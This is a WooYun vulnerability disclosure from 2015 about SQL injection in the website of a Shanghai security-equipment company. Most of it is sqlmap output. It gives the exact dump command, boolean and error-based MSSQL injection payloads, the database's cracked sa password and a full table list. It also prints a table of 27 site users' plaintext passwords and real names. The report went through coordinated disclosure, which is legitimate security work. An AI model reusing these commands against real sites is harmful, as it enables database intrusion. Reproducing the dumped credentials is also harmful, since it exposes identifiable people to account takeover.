当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156583

漏洞标题:上海广拓信息技术有限公司主站存在SQL注射漏洞(DBA权限+sa密码泄露+用户明文密码,真实姓名及邮箱地址泄露)

相关厂商:上海广拓信息技术有限公司

漏洞作者: 路人甲

提交时间:2015-11-30 17:50

修复时间:2016-01-18 11:24

公开时间:2016-01-18 11:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-30: 细节已通知厂商并且等待厂商处理中
2015-12-04: 厂商已经确认,细节仅向厂商公开
2015-12-14: 细节向核心白帽子及相关领域专家公开
2015-12-24: 细节向普通白帽子公开
2016-01-03: 细节向实习白帽子公开
2016-01-18: 细节向公众公开

简要描述:

上海广拓信息技术有限公司是中国领先的安防整体解决方案提供商,一直致力于用技术的进步创造安全的生存环境。公司在安防领域提供先进的产品、解决方案与专业的服务,已成功为数万家企业和政府单位提供了安防服务,客户遍布全国32个省、市和地区。
广拓是上海市政府认定的高新技术企业、软件企业,脉冲电子围栏国家标准、张力电子围栏行业标准、泄漏电缆行业标准的起草单位,中国安防协会副理事长,一级安防资质企业,拥有20多项国家专利,多项软件产品被上海市政府认定。深耕安防行业多年,广拓屡受殊荣,先后获得中国安防十大民族品牌、安博会创新产品优秀奖、“平安城市”推荐优秀安防产品、十大防盗报警品牌、最受关注十大安防企业、连续七年获得最大电子围栏供应商等称号。
广拓对于研发与品质的专注,使公司拥有业内乃至世界领先的技术,是众多行业第一的缔造者,并且不断引领行业向前发展。广拓产品线丰富,陆续推出了具有完全自主知识产权的脉冲电子围栏、张力电子围栏、报警主机、泄漏电缆、振动光纤等周界报警产品;网络高清摄像机、模拟摄像机、硬盘录像机、网络存储设备等视频监控产品;并自主开发出功能强大的安防管理平台——SAM100软件。

详细说明:

地址:http://**.**.**.**/product/detail.aspx?id=10

$ python sqlmap.py -u "http://**.**.**.**/product/detail.aspx?id=10" -p id --technique=BE --random-agent --batch  -D cwf2035_db_data -T dbo.TB_User -C UserName,PassWord,RealName,Email --dump


current user:    'sa'
current user is DBA:    True
database management system users [1]:
[*] sa
database management system users password hashes:
[*] sa [1]:
    password hash: 0x01004086ceb6dd95787212f9bc3390591b8caa91859ff2fd1abf
        header: 0x0100
        salt: 4086ceb6
        mixedcase: dd95787212f9bc3390591b8caa91859ff2fd1abf
    clear-text password: 1234abcd


Database: master
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| sys.messages                                     | 15328   |
| sys.sysmessages                                  | 15328   |


Database: cwf2035_db_data
Table: TB_User
[27 entries]
+-------------------+---------------+----------+-----------------------+
| UserName          | PassWord      | RealName | Email                 |
+-------------------+---------------+----------+-----------------------+
| 1112              | 123456        | 1133     | 11232@**.**.**.**         |
| 1145238159@**.**.**.** | abc1515       | <blank>  | 1145238159@**.**.**.**     |
| zhmch             | zhmchzhmch    | 赵明诚      | 15000491546@**.**.**.**   |
| 陈杰枫               | 12345678      | <blank>  | 1603100354@**.**.**.**     |
| 686868            | 666888        | 肖伟       | 1784817653@**.**.**.**     |
| qzcjc202          | qzcjc113322   | <blank>  | 254349928@**.**.**.**      |
| t123456           | 123456789     | <blank>  | 273656358@**.**.**.**      |
| 庄义飞               | 18916679133   | 庄义飞      | 309434905@**.**.**.**      |
| zxf               | 123456        | <blank>  | 435345345@**.**.**.**      |
| zxf2              | 123456        | 张飞       | 517809235@**.**.**.**      |
| baoyuzhuang       | 123456        | 包玉壮      | adsl1980@**.**.**.**      |
| chton1688         | ct2498        | 魏新明      | chton1688@**.**.**.**    |
| cowly99           | 3344179       | 张海银      | cowly99@**.**.**.**       |
| jsczjst           | jiao19871006  | 焦建军      | czkinst@**.**.**.**   |
| hellosir          | hellosir      | wooyun   | dasd@**.**.**.**           |
| fb@**.**.**.**    | fb900108/ *-  | 付兵       | fb@**.**.**.**        |
| 杭州数尔 傅清丽          | 123456        | 傅清丽      | fuqingli@**.**.**.**   |
| G9876             | 750710        | 顾        | [email protected]         |
| adan              | 123456        | 许多多      | geng532553081@**.**.**.** |
| wuhaijun          | 123456        | 吴军       | hgailq@**.**.**.**        |
| auckland          | 12345678      | gato     | hym@**.**.**.**       |
| jalyjsl           | jaly19800522  | 李江宏      | jalyjsl@**.**.**.**       |
| jon11             | qianlong      | 李强       | jonli12@**.**.**.**       |
| lwj               | 19870916ok    | 娄伟建      | lwj@**.**.**.**       |
| 欧斯伦               | ap20150116    | 李明辉      | osilunjinshu@**.**.**.**  |
| WZYLLDL           | 0761636515WZY | <blank>  | [email protected]       |
| zhaozhilong       | wanglemima123 | 赵志龙      | zzl@**.**.**.**       |
+-------------------+---------------+----------+-----------------------+

漏洞证明:

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=10 AND 5772=5772
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=10 AND 2620=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (2620=2620) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(112)+CHAR(113)))
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
current user:    'sa'
current user is DBA:    True
database management system users [1]:
[*] sa
database management system users password hashes:
[*] sa [1]:
    password hash: 0x01004086ceb6dd95787212f9bc3390591b8caa91859ff2fd1abf
        header: 0x0100
        salt: 4086ceb6
        mixedcase: dd95787212f9bc3390591b8caa91859ff2fd1abf
    clear-text password: 1234abcd
Database: master
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| sys.messages                                     | 15328   |
| sys.sysmessages                                  | 15328   |
| sys.syscolumns                                   | 11273   |
| sys.all_parameters                               | 6761    |
| sys.system_parameters                            | 6761    |
| sys.trace_subclass_values                        | 4729    |
| sys.all_columns                                  | 4307    |
| sys.trace_event_bindings                         | 3965    |
| sys.dm_os_memory_objects                         | 3799    |
| sys.system_columns                               | 3749    |
| sys.syscomments                                  | 2796    |
| dbo.spt_values                                   | 2346    |
| sys.all_objects                                  | 1839    |
| sys.sysobjects                                   | 1839    |
| sys.system_objects                               | 1773    |
| sys.database_permissions                         | 1679    |
| sys.syspermissions                               | 1678    |
| sys.sysprotects                                  | 1676    |
| sys.dm_os_buffer_descriptors                     | 1649    |
| sys.all_sql_modules                              | 1623    |
| sys.system_sql_modules                           | 1621    |
| sys.dm_os_memory_cache_entries                   | 1587    |
| sys.dm_os_virtual_address_dump                   | 1559    |
| sys.dm_os_ring_buffers                           | 1441    |
| sys.syscacheobjects                              | 1320    |
| sys.dm_exec_cached_plans                         | 1055    |
| sys.system_internals_partition_columns           | 693     |
| sys.dm_os_performance_counters                   | 635     |
| sys.sysperfinfo                                  | 635     |
| sys.columns                                      | 558     |
| sys.dm_exec_query_stats                          | 380     |
| sys.dm_exec_query_transformation_stats           | 380     |
| sys.stats_columns                                | 293     |
| sys.all_views                                    | 286     |
| sys.system_views                                 | 286     |
| sys.index_columns                                | 219     |
| sys.sysindexkeys                                 | 219     |
| sys.dm_os_wait_stats                             | 202     |
| sys.event_notification_event_types               | 193     |
| sys.sysindexes                                   | 175     |
| sys.trace_events                                 | 171     |
| sys.stats                                        | 169     |
| sys.dm_os_latch_stats                            | 138     |
| sys.syscharsets                                  | 114     |
| sys.allocation_units                             | 112     |
| sys.system_internals_allocation_units            | 112     |
| sys.dm_db_partition_stats                        | 101     |
| sys.indexes                                      | 101     |
| sys.partitions                                   | 101     |
| sys.system_internals_partitions                  | 101     |
| sys.system_components_surface_area_configuration | 99      |
| sys.xml_schema_facets                            | 97      |
| sys.dm_os_memory_clerks                          | 93      |
| sys.xml_schema_components                        | 93      |
| sys.dm_os_memory_cache_clock_hands               | 90      |
| sys.xml_schema_types                             | 77      |
| sys.dm_os_loaded_modules                         | 73      |
| sys.objects                                      | 66      |
| sys.trace_columns                                | 65      |
| sys.configurations                               | 64      |
| sys.sysconfigures                                | 64      |
| sys.syscurconfigs                                | 64      |
| sys.dm_db_index_usage_stats                      | 62      |
| INFORMATION_SCHEMA.COLUMNS                       | 50      |
| sys.dm_os_memory_cache_counters                  | 45      |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES             | 44      |
| sys.dm_exec_query_optimizer_info                 | 38      |
| sys.dm_os_memory_cache_hash_tables               | 36      |
| sys.syslanguages                                 | 33      |
| sys.dm_os_threads                                | 30      |
| sys.systypes                                     | 27      |
| sys.types                                        | 27      |
| sys.dm_os_worker_local_storage                   | 25      |
| sys.dm_os_workers                                | 25      |
| sys.dm_os_memory_pools                           | 23      |
| sys.sysprocesses                                 | 22      |
| sys.dm_db_session_space_usage                    | 21      |
| sys.dm_db_task_space_usage                       | 21      |
| sys.dm_exec_sessions                             | 21      |
| sys.securable_classes                            | 21      |
| sys.trace_categories                             | 21      |
| sys.dm_tran_active_transactions                  | 20      |
| sys.dm_tran_database_transactions                | 20      |
| sys.dm_exec_requests                             | 19      |
| sys.server_principals                            | 19      |
| sys.dm_os_tasks                                  | 18      |
| sys.server_permissions                           | 17      |
| sys.xml_schema_component_placements              | 17      |
| sys.database_principals                          | 16      |
| sys.sysusers                                     | 16      |
| INFORMATION_SCHEMA.SCHEMATA                      | 14      |
| sys.schemas                                      | 14      |
| sys.service_message_types                        | 14      |
| sys.xml_schema_attributes                        | 14      |
| sys.dm_os_waiting_tasks                          | 11      |
| sys.service_contract_message_usages              | 11      |
| sys.master_files                                 | 10      |
| sys.sysaltfiles                                  | 10      |
| sys.syslogins                                    | 10      |
| sys.crypt_properties                             | 8       |
| INFORMATION_SCHEMA.TABLES                        | 6       |
| sys.service_contracts                            | 6       |
| sys.tables                                       | 6       |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES              | 5       |
| sys.certificates                                 | 5       |
| sys.database_mirroring                           | 5       |
| sys.database_recovery_status                     | 5       |
| sys.databases                                    | 5       |
| sys.dm_tran_locks                                | 5       |
| sys.endpoints                                    | 5       |
| sys.sysdatabases                                 | 5       |
| sys.syslockinfo                                  | 5       |
| sys.server_role_members                          | 4       |
| dbo.MSreplication_options                        | 3       |
| sys.dm_clr_properties                            | 3       |
| sys.dm_os_schedulers                             | 3       |
| sys.identity_columns                             | 3       |
| sys.internal_tables                              | 3       |
| sys.login_token                                  | 3       |
| sys.service_queue_usages                         | 3       |
| sys.service_queues                               | 3       |
| sys.services                                     | 3       |
| sys.syssegments                                  | 3       |
| sys.xml_schema_namespaces                        | 3       |
| INFORMATION_SCHEMA.ROUTINES                      | 2       |
| sys.database_files                               | 2       |
| sys.dm_broker_queue_monitors                     | 2       |
| sys.dm_exec_connections                          | 2       |
| sys.dm_exec_query_resource_semaphores            | 2       |
| sys.dm_os_hosts                                  | 2       |
| sys.key_encryptions                              | 2       |
| sys.procedures                                   | 2       |
| sys.service_contract_usages                      | 2       |
| sys.sql_modules                                  | 2       |
| sys.sysfiles                                     | 2       |
| sys.tcp_endpoints                                | 2       |
| dbo.spt_monitor                                  | 1       |
| sys.data_spaces                                  | 1       |
| sys.database_role_members                        | 1       |
| sys.default_constraints                          | 1       |
| sys.dm_db_file_space_usage                       | 1       |
| sys.dm_exec_background_job_queue_stats           | 1       |
| sys.dm_os_sys_info                               | 1       |
| sys.dm_tran_current_transaction                  | 1       |
| sys.filegroups                                   | 1       |
| sys.linked_logins                                | 1       |
| sys.routes                                       | 1       |
| sys.servers                                      | 1       |
| sys.sql_logins                                   | 1       |
| sys.symmetric_keys                               | 1       |
| sys.sysconstraints                               | 1       |
| sys.sysfilegroups                                | 1       |
| sys.sysmembers                                   | 1       |
| sys.sysoledbusers                                | 1       |
| sys.sysservers                                   | 1       |
| sys.traces                                       | 1       |
| sys.user_token                                   | 1       |
| sys.via_endpoints                                | 1       |
| sys.xml_schema_collections                       | 1       |
| sys.xml_schema_model_groups                      | 1       |
| sys.xml_schema_wildcards                         | 1       |
+--------------------------------------------------+---------+
Database: cwf2035_db_data
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.TB_Leaveword                                 | 5538    |
| dbo.TB_Case                                      | 847     |
| dbo.V_Case                                       | 847     |
| cwf2035.V_Search                                 | 759     |
| dbo.V_Search                                     | 759     |
| dbo.TB_News                                      | 606     |
| dbo.V_News                                       | 606     |
| dbo.TB_AdminLog                                  | 172     |
| dbo.V_AdminLog                                   | 172     |
| dbo.TB_ProductPic                                | 164     |
| dbo.TB_Download                                  | 141     |
| dbo.V_Download                                   | 141     |
| dbo.TB_Product                                   | 134     |
| dbo.V_Product                                    | 134     |
| dbo.TB_Article                                   | 94      |
| dbo.V_Article                                    | 94      |
| dbo.TB_Advertising                               | 87      |
| dbo.TB_Area                                      | 66      |
| dbo.V_Area                                       | 66      |
| dbo.TB_TPermission                               | 65      |
| dbo.TB_WebTree                                   | 59      |
| dbo.TB_Honor                                     | 57      |
| dbo.TB_StaffPic                                  | 43      |
| dbo.TB_ProductType                               | 39      |
| dbo.TB_User                                      | 27      |
| dbo.TB_FAQ                                       | 26      |
| dbo.TB_Solu                                      | 19      |
| dbo.V_Solu                                       | 19      |
| dbo.TB_Pager                                     | 15      |
| dbo.V_Pager                                      | 15      |
| dbo.TB_Feedback                                  | 14      |
| dbo.TB_Link                                      | 10      |
| dbo.TB_Role                                      | 7       |
| dbo.TB_Job                                       | 6       |
| dbo.TB_Staff                                     | 5       |
| dbo.TB_Admin                                     | 3       |
| dbo.TB_Discount                                  | 1       |
+--------------------------------------------------+---------+
Database: msdb
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.MSdbms_datatype_mapping                      | 325     |
| dbo.sysdatatypemappings                          | 325     |
| dbo.MSdbms_map                                   | 248     |
| dbo.MSdatatype_mappings                          | 174     |
| dbo.MSdbms_datatype                              | 141     |
| dbo.syscategories                                | 21      |
| dbo.syssubsystems                                | 10      |
| dbo.MSdbms                                       | 7       |
| dbo.sysmail_configuration                        | 7       |
| dbo.sysdtscategories                             | 3       |
| dbo.sysdtspackagefolders90                       | 2       |
| dbo.sysdbmaintplans                              | 1       |
| dbo.sysmail_servertype                           | 1       |
| dbo.sysoriginatingservers_view                   | 1       |
| dbo.systargetservers_view                        | 1       |
+--------------------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: master
Table: sysoledbusers
[1 column]
+-------------+----------+
| Column      | Type     |
+-------------+----------+
| rmtpassword | nvarchar |
+-------------+----------+
Database: master
Table: syslogins
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| password | nvarchar |
+----------+----------+
Database: master
Table: sysusers
[1 column]
+----------+-----------+
| Column   | Type      |
+----------+-----------+
| password | varbinary |
+----------+-----------+
Database: master
Table: sql_logins
[1 column]
+---------------+-----------+
| Column        | Type      |
+---------------+-----------+
| password_hash | varbinary |
+---------------+-----------+
Database: cwf2035_db_data
Table: TB_News
[1 column]
+--------+------+
| Column | Type |
+--------+------+
| IsPass | bit  |
+--------+------+
Database: cwf2035_db_data
Table: TB_Staff
[1 column]
+--------+------+
| Column | Type |
+--------+------+
| IsPass | bit  |
+--------+------+
Database: cwf2035_db_data
Table: TB_Solu
[1 column]
+--------+------+
| Column | Type |
+--------+------+
| IsPass | bit  |
+--------+------+
Database: cwf2035_db_data
Table: TB_Feedback
[1 column]
+--------+------+
| Column | Type |
+--------+------+
| IsPass | bit  |
+--------+------+
Database: cwf2035_db_data
Table: TB_User
[3 columns]
+-----------+----------+
| Column    | Type     |
+-----------+----------+
| IsPass    | bit      |
| PassReset | nvarchar |
| PassWord  | nvarchar |
+-----------+----------+
Database: cwf2035_db_data
Table: V_Product
[1 column]
+--------+------+
| Column | Type |
+--------+------+
| IsPass | bit  |
+--------+------+
Database: cwf2035_db_data
Table: TB_Job
[1 column]
+--------+------+
| Column | Type |
+--------+------+
| IsPass | bit  |
+--------+------+
Database: cwf2035_db_data
Table: V_Pager
[1 column]
+--------+------+
| Column | Type |
+--------+------+
| IsPass | bit  |
+--------+------+
Database: cwf2035_db_data
Table: TB_StaffPic
[1 column]
+--------+------+
| Column | Type |
+--------+------+
| IsPass | bit  |
+--------+------+
Database: cwf2035_db_data
Table: V_Solu
[1 column]
+--------+------+
| Column | Type |
+--------+------+
| IsPass | bit  |
+--------+------+
Database: cwf2035_db_data
Table: V_News
[1 column]
+--------+------+
| Column | Type |
+--------+------+
| IsPass | bit  |
+--------+------+
Database: cwf2035_db_data
Table: TB_Advertising
[1 column]
+--------+------+
| Column | Type |
+--------+------+
| IsPass | bit  |
+--------+------+
Database: cwf2035_db_data
Table: TB_ProductPic
[1 column]
+--------+------+
| Column | Type |
+--------+------+
| IsPass | bit  |
+--------+------+
Database: cwf2035_db_data
Table: TB_Article
[1 column]
+--------+------+
| Column | Type |
+--------+------+
| IsPass | bit  |
+--------+------+
Database: cwf2035_db_data
Table: V_Search
[1 column]
+--------+------+
| Column | Type |
+--------+------+
| IsPass | bit  |
+--------+------+
Database: cwf2035_db_data
Table: TB_Product
[1 column]
+--------+------+
| Column | Type |
+--------+------+
| IsPass | bit  |
+--------+------+
Database: cwf2035_db_data
Table: TB_Download
[1 column]
+--------+------+
| Column | Type |
+--------+------+
| IsPass | bit  |
+--------+------+
Database: cwf2035_db_data
Table: V_Case
[1 column]
+--------+------+
| Column | Type |
+--------+------+
| IsPass | bit  |
+--------+------+
Database: cwf2035_db_data
Table: TB_FAQ
[1 column]
+--------+------+
| Column | Type |
+--------+------+
| IsPass | bit  |
+--------+------+
Database: cwf2035_db_data
Table: TB_Honor
[1 column]
+--------+------+
| Column | Type |
+--------+------+
| IsPass | bit  |
+--------+------+
Database: cwf2035_db_data
Table: V_Article
[1 column]
+--------+------+
| Column | Type |
+--------+------+
| IsPass | bit  |
+--------+------+
Database: cwf2035_db_data
Table: TB_Admin
[2 columns]
+----------+----------+
| Column   | Type     |
+----------+----------+
| IsPass   | bit      |
| Password | nvarchar |
+----------+----------+
Database: cwf2035_db_data
Table: TB_Pager
[1 column]
+--------+------+
| Column | Type |
+--------+------+
| IsPass | bit  |
+--------+------+
Database: cwf2035_db_data
Table: TB_Case
[1 column]
+--------+------+
| Column | Type |
+--------+------+
| IsPass | bit  |
+--------+------+
Database: cwf2035_db_data
Table: V_Download
[1 column]
+--------+------+
| Column | Type |
+--------+------+
| IsPass | bit  |
+--------+------+
Database: msdb
Table: backupset
[1 column]
+-----------------------+------+
| Column                | Type |
+-----------------------+------+
| is_password_protected | bit  |
+-----------------------+------+
Database: msdb
Table: backupmediaset
[1 column]
+-----------------------+------+
| Column                | Type |
+-----------------------+------+
| is_password_protected | bit  |
+-----------------------+------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=10 AND 5772=5772
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=10 AND 2620=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (2620=2620) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(112)+CHAR(113)))
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
Database: cwf2035_db_data
Table: TB_User
[13 columns]
+-----------+----------+
| Column    | Type     |
+-----------+----------+
| AddTime   | datetime |
| Company   | nvarchar |
| Email     | nvarchar |
| ID        | int      |
| IsPass    | bit      |
| Lastlog   | datetime |
| Lognum    | int      |
| PassReset | nvarchar |
| PassWord  | nvarchar |
| RealName  | nvarchar |
| Sex       | int      |
| Tel       | nvarchar |
| UserName  | nvarchar |
+-----------+----------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=10 AND 5772=5772
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=10 AND 2620=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (2620=2620) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(112)+CHAR(113)))
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
Database: cwf2035_db_data
Table: TB_User
[27 entries]
+-------------------+---------------+----------+-----------------------+
| UserName          | PassWord      | RealName | Email                 |
+-------------------+---------------+----------+-----------------------+
| 1112              | 123456        | 1133     | 11232@**.**.**.**         |
| 1145238159@**.**.**.** | abc1515       | <blank>  | 1145238159@**.**.**.**     |
| zhmch             | zhmchzhmch    | 赵明诚      | 15000491546@**.**.**.**   |
| 陈杰枫               | 12345678      | <blank>  | 1603100354@**.**.**.**     |
| 686868            | 666888        | 肖伟       | 1784817653@**.**.**.**     |
| qzcjc202          | qzcjc113322   | <blank>  | 254349928@**.**.**.**      |
| t123456           | 123456789     | <blank>  | 273656358@**.**.**.**      |
| 庄义飞               | 18916679133   | 庄义飞      | 309434905@**.**.**.**      |
| zxf               | 123456        | <blank>  | 435345345@**.**.**.**      |
| zxf2              | 123456        | 张飞       | 517809235@**.**.**.**      |
| baoyuzhuang       | 123456        | 包玉壮      | adsl1980@**.**.**.**      |
| chton1688         | ct2498        | 魏新明      | chton1688@**.**.**.**    |
| cowly99           | 3344179       | 张海银      | cowly99@**.**.**.**       |
| jsczjst           | jiao19871006  | 焦建军      | czkinst@**.**.**.**   |
| hellosir          | hellosir      | wooyun   | dasd@**.**.**.**           |
| fb@**.**.**.**    | fb900108/ *-  | 付兵       | fb@**.**.**.**        |
| 杭州数尔 傅清丽          | 123456        | 傅清丽      | fuqingli@**.**.**.**   |
| G9876             | 750710        | 顾        | [email protected]         |
| adan              | 123456        | 许多多      | geng532553081@**.**.**.** |
| wuhaijun          | 123456        | 吴军       | hgailq@**.**.**.**        |
| auckland          | 12345678      | gato     | hym@**.**.**.**       |
| jalyjsl           | jaly19800522  | 李江宏      | jalyjsl@**.**.**.**       |
| jon11             | qianlong      | 李强       | jonli12@**.**.**.**       |
| lwj               | 19870916ok    | 娄伟建      | lwj@**.**.**.**       |
| 欧斯伦               | ap20150116    | 李明辉      | osilunjinshu@**.**.**.**  |
| WZYLLDL           | 0761636515WZY | <blank>  | [email protected]       |
| zhaozhilong       | wanglemima123 | 赵志龙      | zzl@**.**.**.**       |
+-------------------+---------------+----------+-----------------------+

修复方案:

增加过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-12-04 10:59

厂商回复:

CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。

最新状态:

暂无